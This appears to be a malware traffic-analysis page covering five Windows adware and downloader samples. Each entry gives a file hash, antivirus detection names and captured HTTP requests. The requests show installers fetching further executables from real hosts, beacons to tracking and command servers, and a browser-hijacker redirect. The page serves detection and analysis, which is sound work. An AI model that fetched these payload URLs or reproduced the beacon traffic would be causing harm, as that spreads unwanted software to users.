PUP Trojan/Adware Borderline Porn Application Downloader Pay-per-Download Malware PCAP file download

SHA256: 478f86e31c4bd8bd6ccf86696375949029d20f6736c4e01c577e99adec0c112d
File name: pingguo_21561000328.exe
Detection ratio: 44 / 57
Analysis date: 2017-01-16 06:11:12 UTC ( 0 minutes ago )
AegisLab W32.Application.Guagua!c 20170114
AhnLab-V3 PUP/Win32.Downloader.C880528 20170115
Antiy-AVL Trojan/Win32.TSGeneric 20170116
Arcabit Adware.Generic.D1A3B8D 20170116
Avast Win32:Adware-gen [Adw] 20170116
BitDefender Adware.Generic.1719181 20170116
Bkav W32.Clod07d.Trojan.ffdb 20170114
CAT-QuickHeal Program.Hadsruda 20170116
ClamAV Win.Trojan.Generic-5415795-0 20170116
Comodo ApplicUnwnt.Win32.PornTool.GuaGua.A 20170116
CrowdStrike Falcon (ML) malicious_confidence_64% (D) 20161024
Cyren W32/S-94c424df!Eldorado 20170116
DrWeb Adware.Downware.10691 20170116
ESET-NOD32 a variant of Win32/PornTool.GuaGua.A potentially unsafe 20170116
F-Prot W32/S-94c424df!Eldorado 20170116
F-Secure Adware.Generic.1719181 20170116
Fortinet Riskware/PornTool_GuaGua 20170116
GData Adware.Generic.1719181 20170116
Ikarus PUA.Agent 20170115

2017-01-15 23:06:09.615300 IP 192.168.1.102.62519 > 14.215.74.85.80: Flags [P.], seq 2253497686:2253497989, ack 3986861207, win 256, length 303: HTTP: GET /re58/pingguo_21561000328.exe HTTP/1.1
E..Wm.@…p….f..JU.7.P.Q.V….P…m…GET /re58/pingguo_21561000328.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: c.img001.com
Connection: Keep-Alive

2017-01-15 23:06:16.677816 IP 192.168.1.102.62520 > 66.61.160.250.80: Flags [P.], seq 1637321297:1637321477, ack 1159308532, win 256, length 180: HTTP: GET /sfsca.crl HTTP/1.1
E…Y.@……..fB=…8.Pa..QE…P….D..GET /sfsca.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.startssl.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

2017-01-15 23:06:17.308817 IP 192.168.1.102.62521 > 222.73.144.174.80: Flags [P.], seq 281322195:281322373, ack 2294700839, win 260, length 178: HTTP: GET /ca1.crl HTTP/1.1
E…..@….=…f.I…9.P……[‘P…….GET /ca1.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crls1.wosign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

2017-01-15 23:06:17.601080 IP 192.168.1.102.62521 > 222.73.144.174.80: Flags [P.], seq 178:363, ack 1075, win 256, length 185: HTTP: GET /ca1-code-3.crl HTTP/1.1
E…..@….5…f.I…9.P……_YP…c:..GET /ca1-code-3.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crls1.wosign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

2017-01-15 23:06:23.023581 IP 192.168.1.102.62522 > 117.27.228.84.80: Flags [P.], seq 3283022524:3283022767, ack 1419530151, win 256, length 243: HTTP: GET /downloader/start?dlver=G1.0.0&pname=pingguo55&pver=1.0.0&cmdtype=0&cmdid=1&ad=0&oemid=0&fromurl=&webid= HTTP/1.1
E…;.@……..fu..T.:.P….T.O.P…….GET /downloader/start?dlver=G1.0.0&pname=pingguo55&pver=1.0.0&cmdtype=0&cmdid=1&ad=0&oemid=0&fromurl=&webid= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
Host: cj.pingguo55.com
Cache-Control: no-cache

2017-01-15 23:07:14.841174 IP 192.168.1.102.62522 > 117.27.228.84.80: Flags [P.], seq 243:547, ack 245, win 255, length 304: HTTP: GET /downloader/startdown?dlver=G1.0.0&pname=pingguo55&pver=1.0.0&cmdtype=0&cmdid=1&ad=0&oemid=0&fromurl=&webid= HTTP/1.1
E..X;.@….k…fu..T.:.P….T.P.P…….GET /downloader/startdown?dlver=G1.0.0&pname=pingguo55&pver=1.0.0&cmdtype=0&cmdid=1&ad=0&oemid=0&fromurl=&webid= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
Host: cj.pingguo55.com
Cache-Control: no-cache
Cookie: GUAGUAACOUNTID=9d58da31cb70431fa57b0dd19171c119

2017-01-15 23:07:15.462551 IP 192.168.1.102.62523 > 117.27.228.83.80: Flags [P.], seq 52355107:52355286, ack 1485008876, win 256, length 179: HTTP: HEAD /business/5/pingguo.exe HTTP/1.1
E….A@….^…fu..S.;.P…#X.o.P…….HEAD /business/5/pingguo.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
Host: tg.img001.com
Content-Length: 0
Cache-Control: no-cache

2017-01-15 23:07:16.161211 IP 192.168.1.102.62524 > 117.27.228.83.80: Flags [P.], seq 3252730637:3252730820, ack 1975907044, win 256, length 183: HTTP: GET /business/5/pingguo.exe HTTP/1.1
E….G@….T…fu..S.<.P….u…P….>..GET /business/5/pingguo.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
Range: bytes=0-3686399
Host: tg.img001.com
Accept: */*
Cache-Control: no-cache

2017-01-15 23:07:16.186591 IP 192.168.1.102.62525 > 117.27.228.83.80: Flags [P.], seq 1631289889:1631290079, ack 4275762285, win 256, length 190: HTTP: GET /business/5/pingguo.exe HTTP/1.1
E….I@….K…fu..S.=.Pa;.!…mP…z…GET /business/5/pingguo.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
Range: bytes=3686400-18386360
Host: tg.img001.com
Accept: */*
Cache-Control: no-cache

Thunder Adware PUP PCAP File Download Traffic Analysis Sample xunlei_118827.exe

SHA256: bf1cf754ad5f5f3560047b8eeb784c72bf79a042dec4d50d033e32912a7b19b6
File name: xunlei_118827.exe
Detection ratio: 35 / 56
Analysis date: 2016-10-28 03:31:01 UTC ( 0 minutes ago )
AVware Trojan.Win32.Generic!BT 20161027
Ad-Aware Adware.Thunder.E 20161028
AegisLab Troj.Gen!c 20161028
AhnLab-V3 PUP/Win32.Helper.R188024 20161027
Arcabit Adware.Thunder.E 20161028
BitDefender Adware.Thunder.E 20161028
Comodo UnclassifiedMalware 20161028
CrowdStrike Falcon (ML) malicious_confidence_76% (W) 20161024
Cyren W32/Adware.AOGL-3044 20161028
DrWeb Adware.Downware.2436 20161028
ESET-NOD32 a variant of Win32/RiskWare.ThunderHelper.A 20161028
Emsisoft Adware.Thunder.E (B) 20161028
F-Prot W32/Adware.ALLT 20161028
F-Secure Adware.Thunder.E 20161028
Fortinet Bfr.FJ!tr 20161028
GData Adware.Thunder.E 20161028
Invincea backdoor.win32.dunsenr.b 20161018
K7AntiVirus Riskware ( 0040eff71 ) 20161025

 

2016-10-27 20:13:00.327418 IP 192.168.1.102.56001 > 61.147.75.43.80: Flags [P.], seq 0:292, ack 1, win 256, length 292: HTTP: GET /xunlei_118827.exe HTTP/1.1
E..L=.@…p….f=.K+…P..wv4)O.P…g<..GET /xunlei_118827.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.pf11.com
Connection: Keep-Alive

2016-10-27 20:13:00.582113 IP 192.168.1.102.56001 > 61.147.75.43.80: Flags [.], ack 1073, win 252, length 0
E..(=.@…r….f=.K+…P..x.4)T.P….”……..

2016-10-27 20:13:08.057545 IP 192.168.1.102.56002 > 61.147.75.43.80: Flags [P.], seq 0:220, ack 1, win 256, length 220: HTTP: GET /html/index.asp HTTP/1.1
E…>N@…p….f=.K+…P}./..[..P…….GET /html/index.asp HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: m.pf11.com
Connection: Keep-Alive

2016-10-27 20:13:08.307815 IP 192.168.1.102.56002 > 61.147.75.43.80: Flags [P.], seq 220:491, ack 409, win 255, length 271: HTTP: GET /index.html HTTP/1.1
E..7>O@…p….f=.K+…P}.0h.[.=P…….GET /index.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: m.pf11.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDSAQBRRAC=JBCFOGDBBPAIPFJMNJCNJFDM

2016-10-27 20:13:08.556954 IP 192.168.1.102.56002 > 61.147.75.43.80: Flags [.], ack 1481, win 256, length 0

2016-10-27 20:13:09.342501 IP 192.168.1.102.56002 > 61.147.75.43.80: Flags [P.], seq 491:803, ack 12265, win 256, length 312: HTTP: GET /homepage.asp HTTP/1.1
E..`>]@…pn…f=.K+…P}.1w.[..P…V…GET /homepage.asp HTTP/1.1
Accept: */*
Referer: http://m.pf11.com/index.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: m.pf11.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDSAQBRRAC=JBCFOGDBBPAIPFJMNJCNJFDM

2016-10-27 20:13:09.587021 IP 192.168.1.102.56004 > 61.147.75.43.80: Flags [P.], seq 0:309, ack 1, win 256, length 309: HTTP: GET /json3.asp HTTP/1.1
E..]>_@…po…f=.K+…P.9I…..P…….GET /json3.asp HTTP/1.1
Accept: */*
Referer: http://m.pf11.com/index.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: m.pf11.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDSAQBRRAC=JBCFOGDBBPAIPFJMNJCNJFDM


2016-10-27 20:13:09.636681 IP 192.168.1.102.56002 > 61.147.75.43.80: Flags [P.], seq 803:1115, ack 17064, win 251, length 312: HTTP: GET /xl_login.asp HTTP/1.1
E..`>e@…pf…f=.K+…P}.2..[.LP…0…GET /xl_login.asp HTTP/1.1
Accept: */*
Referer: http://m.pf11.com/index.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: m.pf11.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDSAQBRRAC=JBCFOGDBBPAIPFJMNJCNJFDM


2016-10-27 20:13:09.655618 IP 192.168.1.102.56005 > 202.100.74.200.80: Flags [P.], seq 0:281, ack 1, win 256, length 281: HTTP: GET /stat.php?id=5808533&web_id=5808533 HTTP/1.1
E..AAI@….2…f.dJ….PK.2V….P…)…GET /stat.php?id=5808533&web_id=5808533 HTTP/1.1
Accept: */*
Referer: http://m.pf11.com/index.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: s13.cnzz.com
Connection: Keep-Alive

 

2016-10-27 20:13:40.614387 IP 192.168.1.102.56023 > 66.198.178.112.80: Flags [P.], seq 0:205, ack 1, win 256, length 205: HTTP: GET /down/4682/Browser_V5.7.16173.12_r_4682_(Build1610201330).exe HTTP/1.1
E…..@…5….fB..p…P..W…! P…….GET /down/4682/Browser_V5.7.16173.12_r_4682_(Build1610201330).exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: umcdn.uc.cn
Connection: Keep-Alive

Mikey PUP Trojan Adware Downloader CNC PCAP file download Traffic Sample hplaserjetm1136@151_11446.exe

SHA256: e7e729e9d23aeac5ff826c5d3389f5c1cc2982d3d43168e2f5af705709db47da
File name: hplaserjetm1136@151_11446.exe
Detection ratio: 39 / 54
Analysis date: 2016-10-28 01:48:35 UTC ( 1 minute ago )
AVG Generic37.CELZ 20161028
AVware Trojan.Win32.Generic!BT 20161027
Ad-Aware Gen:Variant.Application.Mikey.34859 20161028
AegisLab Adware.W32.Agent!c 20161027
AhnLab-V3 PUP/Win32.Installer.R185010 20161027
Antiy-AVL Trojan/Win32.PackedNsisMod.o 20161027
Arcabit Trojan.Application.Mikey.D882B 20161028
Avast Win32:Malware-gen 20161027
BitDefender Gen:Variant.Application.Mikey.34859 20161028
CAT-QuickHeal Heur.Downloader 20161027
ClamAV Win.Trojan.Agent-1726718 20161027
Comodo Application.Win32.NSISmod.~O 20161028
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20161024
Cyren W32/Mikey.U.gen!Eldorado 20161028
DrWeb Trojan.Winlock.13291 20161028
ESET-NOD32 a variant of Win32/Packed.NSISmod.O suspicious 20161028
F-Prot W32/Mikey.U.gen!Eldorado 20161028
F-Secure Gen:Variant.Application.Mikey 20161028
Fortinet Adware/Agent 20161028

 

 

2016-10-27 19:13:52.690393 IP 192.168.1.102.55661 > 61.172.246.236.80: Flags [P.], seq 0:329, ack 1, win 256, length 329: HTTP: GET /cx/160624/6/hplaserjetm1136@151_11446.exe HTTP/1.1
E..qn.@….W…f=….m.Pc.(s..A.P….g..GET /cx/160624/6/hplaserjetm1136@151_11446.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 1476500920.xiazaidown.com
Connection: Keep-Alive

2016-10-27 19:14:16.551335 IP 192.168.1.102.55664 > 121.43.113.145.80: Flags [P.], seq 0:193, ack 1, win 256, length 193: HTTP: GET /api.php?id=11446[1]&qid=151&rand=52229065361&title=hplaserjetm1136&t=0 HTTP/1.1
E…..@…L….fy+q..p.P..~;.p=LP…:W..GET /api.php?id=11446[1]&qid=151&rand=52229065361&title=hplaserjetm1136&t=0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: down.xiald.com
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-27 19:14:16.805491 IP 192.168.1.102.55319 > 75.75.75.75.53: 43761+ A? www.drvsky.com. (32)
E..<‘……D…fKKKK…5.(r…………..www.drvsky.com…..
2016-10-27 19:14:16.852510 IP 192.168.1.102.55664 > 121.43.113.145.80: Flags [.], ack 430, win 254, length 0
E..(..@…MN…fy+q..p.P..~..p>.P………….

2016-10-27 19:14:17.354802 IP 192.168.1.102.55665 > 121.40.20.195.80: Flags [P.], seq 0:144, ack 1, win 256, length 144: HTTP: GET /down_api.asp?id=11446 HTTP/1.1
E…’Q@……..fy(…q.P>…]..;P…y…GET /down_api.asp?id=11446 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: www.drvsky.com
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-27 19:14:17.910185 IP 192.168.1.102.55665 > 121.40.20.195.80: Flags [.], ack 937, win 252, length 0
E..(‘R@……..fy(…q.P>…]…P….D……..
2016-10-27 19:14:18.794922 IP 192.168.1.102.55664 > 121.43.113.145.80: Flags [P.], seq 193:396, ack 430, win 254, length 203: HTTP: GET /cfg.php?id=11446[1]&qid=151&rand=52229065361&title=hplaserjetm1136&t=0&flag=1024 HTTP/1.1
E…..@…L….fy+q..p.P..~..p>.P…….GET /cfg.php?id=11446[1]&qid=151&rand=52229065361&title=hplaserjetm1136&t=0&flag=1024 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: down.xiald.com
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-27 19:14:19.088333 IP 192.168.1.102.55664 > 121.43.113.145.80: Flags [.], ack 3350, win 256, length 0
E..(..@…ML…fy+q..p.P…..pJaP………….
2016-10-27 19:14:19.327336 IP 192.168.1.102.55664 > 121.43.113.145.80: Flags [.], ack 6270, win 256, length 0
E..(..@…MK…fy+q..p.P…..pU.P………….

2016-10-27 19:14:20.661122 IP 192.168.1.102.55666 > 220.243.235.201.80: Flags [P.], seq 0:116, ack 1, win 256, length 116: HTTP: GET /shichangbu/ico/haitao1hao.ico HTTP/1.0
E…{.@……..f…..r.P..dZ..lpP…….GET /shichangbu/ico/haitao1hao.ico HTTP/1.0
Host: down.shg20.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2016-10-27 19:19:56.406517 IP 192.168.1.102.55689 > 221.204.226.184.80: Flags [P.], seq 0:224, ack 1, win 256, length 224: HTTP: GET /yunpan/LaserJet_M1130_M1210_All.zip HTTP/1.1
E…..@…o….f…….P.._&eCdP… y..GET /yunpan/LaserJet_M1130_M1210_All.zip HTTP/1.1
Referer: http://www.drvsky.com/hp/HP_M1136.htm
User-Agent: LXdl_plug-in v15.06.10 (compatible; MSIE 9.0; Windows NT 6.0)
Host: dvip.drvsky.com
Cache-Control: no-cache

2016-10-27 19:19:56.461246 IP 192.168.1.102.55690 > 42.156.140.84.80: Flags [.], ack 3635846172, win 65340, length 0
E..(1.@…O….f*..T…P..N…..P..<……….
2016-10-27 19:19:56.461899 IP 192.168.1.102.55690 > 42.156.140.84.80: Flags [P.], seq 0:374, ack 1, win 65340, length 374: HTTP: GET /stat.htm?id=1256279146&r=&lg=en-us&ntime=none&cnzz_eid=1850689330-1477607248-&showp=1920x1080&t=&h=1&rnd=139741822 HTTP/1.1
E…1.@…Nz…f*..T…P..N…..P..<.F..GET /stat.htm?id=1256279146&r=&lg=en-us&ntime=none&cnzz_eid=1850689330-1477607248-&showp=1920x1080&t=&h=1&rnd=139741822 HTTP/1.1
Accept: */*
Referer: http://xiazai.xiazai2.net/sc/xiazaiqi.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: z4.cnzz.com
Connection: Keep-Alive

FusionCore Trojan/Malware/PUP Downloader Bundled SecureStudies.com Adware PCAP file download traffic sample

SHA256: ab5da9478d76221b534e4847e6968b7977771916ce81ac2810c3917f6ce5a48c
File name: PCTuneUpWiFiHotspotCreator_IS.exe
Detection ratio: 23 / 55
Analysis date: 2016-10-28 01:34:21 UTC ( 1 minute ago )
AVware Trojan.Win32.Generic!BT 20161027
AegisLab Script.Application.Gen!c 20161027
AhnLab-V3 Malware/Gen.Generic.N2102538991 20161027
CAT-QuickHeal PUA.Techevolve.Gen 20161027
ClamAV Win.Trojan.Generic-2682 20161027
Comodo Application.Win32.FusionCore.~J 20161028
Cyren W32/Trojan.IFZA-1289 20161028
DrWeb Trojan.InstallCore.2673 20161028
ESET-NOD32 a variant of Win32/FusionCore.J potentially unwanted 20161028
Fortinet Riskware/FusionCore 20161028
GData Script.Application.FusionCore.B 20161028
Invincea trojan.win32.dorv.b!rfn 20161018
K7AntiVirus Trojan ( 004fb4121 ) 20161025
K7GW Trojan ( 004fb4121 ) 20161027
McAfee Artemis!FC4E7C56C226 20161028
McAfee-GW-Edition BehavesLike.Win32.Dropper.vc 20161028
NANO-Antivirus Trojan.Win32.InstallCore.egpdia 20161028
Symantec Trojan.Gen.2 20161028
TrendMicro TROJ_GEN.F0CBC0UJJ16 20161028
TrendMicro-HouseCall TROJ_GEN.F0CBC0UJJ16 20161028
VIPRE Trojan.Win32.Generic!BT 20161027


2016-10-27 19:39:26.628074 IP 192.168.1.102.55768 > 184.173.227.119.80: Flags [P.], seq 0:348, ack 1, win 256, length 348: HTTP: GET /pctuneupsuite.com/filesdownload/PCTuneUpWiFiHotspotCreator_IS.exe HTTP/1.1
E…/V@…k….f…w…P&……|P…….GET /pctuneupsuite.com/filesdownload/PCTuneUpWiFiHotspotCreator_IS.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.downloadonic.com
Connection: Keep-Alive

2016-10-27 19:39:26.684291 IP 192.168.1.102.55768 > 184.173.227.119.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {1461:2921}], length 0
E..4/W@…m9…f…w…P&..+…|….b……

2016-10-27 19:39:40.320312 IP 192.168.1.102.55769 > 52.2.72.151.80: Flags [P.], seq 0:214, ack 1, win 256, length 214: HTTP: POST /?v=2.0&subver=6.21&pcrc=2064493350 HTTP/1.1
E…F.@…t….f4.H….P..|….gP…n3..POST /?v=2.0&subver=6.21&pcrc=2064493350 HTTP/1.1
Accept: */*
Host: rp.didided1.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Content-Length: 2064
Cache-Control: no-cache

2016-10-27 19:39:40.321074 IP 192.168.1.102.55769 > 52.2.72.151.80: Flags [P.], seq 214:1674, ack 1, win 256, length 1460: HTTP

2016-10-27 19:39:40.889276 IP 192.168.1.102.55770 > 54.68.115.170.80: Flags [P.], seq 0:168, ack 1, win 256, length 168: HTTP: POST /FusionFreeAudioVideo/?v=6.0&c=610669024&t=398890 HTTP/1.1
E…./@…r….f6Ds….P.]…9..P…JA..POST /FusionFreeAudioVideo/?v=6.0&c=610669024&t=398890 HTTP/1.1
Accept: */*
Host: os.didided1.com
User-Agent: ICAS
Content-Length: 1600
Cache-Control: no-cache

2016-10-27 19:39:40.889297 IP 192.168.1.102.55770 > 54.68.115.170.80: Flags [P.], seq 168:1628, ack 1, win 256, length 1460: HTTP

2016-10-27 19:39:40.932824 IP 192.168.1.102.55771 > 165.193.78.234.80: Flags [P.], seq 0:106, ack 1, win 256, length 106: HTTP: GET /packages/VR/PackageV.exe HTTP/1.0
E…..@…=….f..N….P.n…   ~.P….E..GET /packages/VR/PackageV.exe HTTP/1.0
Host: post.securestudies.com
User-Agent: InnoTools_Downloader

2016-10-27 19:42:47.932326 IP 192.168.1.102.55785 > 165.193.78.234.80: Flags [P.], seq 0:257, ack 1, win 256, length 257: HTTP: POST /TapAction.aspx?campaign_id=835&tpi=PCTuneUpWiFiHotspotCreator_IS&action_id=1&uid=jfk_YD1kku5Hj7W9N55555 HTTP/1.0
E..)..@…;….f..N….Pn..F…wP…….POST /TapAction.aspx?campaign_id=835&tpi=PCTuneUpWiFiHotspotCreator_IS&action_id=1&uid=jfk_YD1kku5Hj7W9N55555 HTTP/1.0
Host: post.securestudies.com
User-Agent: InnoTools_Downloader
Content-Type: Application/octet-stream
Content-Length: 11

RK web call
2016-10-27 19:42:47.991700 IP 192.168.1.102.55785 > 165.193.78.234.80: Flags [.], ack 241, win 255, length 0
E..(..@…<….f..N….Pn..G…gP………….
2016-10-27 19:42:47.992217 IP 192.168.1.102.55785 > 165.193.78.234.80: Flags [F.], seq 257, ack 241, win 255, length 0
E..(..@…<….f..N….Pn..G…gP………….

2016-10-27 19:42:48.909219 IP 192.168.1.102.55787 > 199.58.87.155.80: Flags [P.], seq 0:230, ack 1, win 256, length 230: HTTP: GET /ofr/Nininininon/Nininininon_11Apr16.cis HTTP/1.1
E…e.@……..f.:W….P…..6..P…….GET /ofr/Nininininon/Nininininon_11Apr16.cis HTTP/1.1
Range: bytes=0-19488
Accept: */*
Host: cdnus.didided1.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Connection: Keep-Alive

2016-10-27 19:42:48.932162 IP 192.168.1.102.55787 > 199.58.87.155.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {540:2000}], length 0
E..4e.@….Y…f.:W….P…..6…………….6…6..

2016-10-27 19:42:52.983717 IP 192.168.1.102.55787 > 199.58.87.155.80: Flags [P.], seq 230:456, ack 20029, win 254, length 226: HTTP: GET /ofr/Malaromoro/Malaromoro_170515.cis HTTP/1.1
E…e.@….{…f.:W….P…..6f.P…….GET /ofr/Malaromoro/Malaromoro_170515.cis HTTP/1.1
Range: bytes=0-8736
Accept: */*
Host: cdnus.didided1.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Connection: Keep-Alive

 

xigua.exe Plorexie Startpage Browser Hijacker Adware Traffic Analysis PCAP file download sample

SHA256: 9e44c764a9d3681f64f2dfc0bf62454ff463313e193d70614b0d7505204f9170
File name: xigua.exe
Detection ratio: 34 / 56
Analysis date: 2016-10-26 23:29:08 UTC ( 0 minutes ago )
Antivirus Result Update
ALYac Adware.GenericKD.3388535 20161026
AVG Generic_c.ERT 20161026
AVware Trojan.Win32.Generic!BT 20161027
Ad-Aware Adware.GenericKD.3388535 20161026
AegisLab Adware.Generickd!c 20161026
Antiy-AVL Trojan/Generic.ASMalwNS.54D8 20161026
Arcabit Adware.Generic.D33B477 20161026
Avira (no cloud) TR/AD.Plorexie.sourk 20161026
BitDefender Adware.GenericKD.3388535 20161027
CAT-QuickHeal Browsermodifier.Plorexie 20161026
Cyren W32/Plorexie.A.gen!Eldorado 20161027
DrWeb Trojan.Click3.22642 20161027
ESET-NOD32 Win32/StartPage.OVK 20161026

2016-10-25 22:56:18.223887 IP 192.168.1.102.60948 > 58.215.177.195.80: Flags [P.], seq 0:295, ack 1, win 256, length 295: HTTP: GET /618171115/xigua.exe HTTP/1.1
E..Op.@….”…f:……P…h..”.P…….GET /618171115/xigua.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down.cdyb.net
Connection: Keep-Alive

2016-10-25 22:56:30.452318 IP 192.168.1.102.60951 > 119.28.13.101.80: Flags [P.], seq 0:276, ack 1, win 258, length 276: HTTP: GET /1/aHR0cDovLzEyMy5hMTAxLmNjL3UucGhwP2lkPTg5JnNkPW51bGwmYW50PW51bGw= HTTP/1.1
E..<9+@…z….fw..e…P&.0.T…P….”..GET /1/aHR0cDovLzEyMy5hMTAxLmNjL3UucGhwP2lkPTg5JnNkPW51bGwmYW50PW51bGw= HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 17990.vicp.net
Connection: Keep-Alive
2016-10-25 22:56:30.713143 IP 192.168.1.102.62222 > 75.75.76.76.53: 35316+ A? 123.a101.cc. (29)
E..9…….i…fKKLL…5.%&j………….123.a101.cc…..

E..(9.@…{….fw..e…P….fs.MP…t[……..
2016-10-25 22:56:31.329029 IP 192.168.1.102.60952 > 119.28.13.101.80: Flags [P.], seq 0:302, ack 1, win 258, length 302: HTTP: GET /u.php?id=89&sd=null&ant=null HTTP/1.1
E..V9/@…y….fw..e…P….fs.MP…….GET /u.php?id=89&sd=null&ant=null HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 123.a101.cc
Connection: Keep-Alive
2016-10-25 22:56:31.612516 IP 192.168.1.102.62225 > 75.75.75.75.53: 36863+ A? hao.tianqi.cc. (31)
E..;.#………fKKKK…5.’.0………….hao.tianqi.cc…..

E..(^.@….q…fy+j …PJ..E….P….}……..
2016-10-25 22:56:43.258630 IP 192.168.1.102.60953 > 121.43.106.9.80: Flags [P.], seq 0:293, ack 1, win 64240, length 293: HTTP: GET /?sd-null-ant-null HTTP/1.1
E..M^.@….K…fy+j …PJ..E….P….,..GET /?sd-null-ant-null HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: hao.tianqi.cc
Connection: Keep-Alive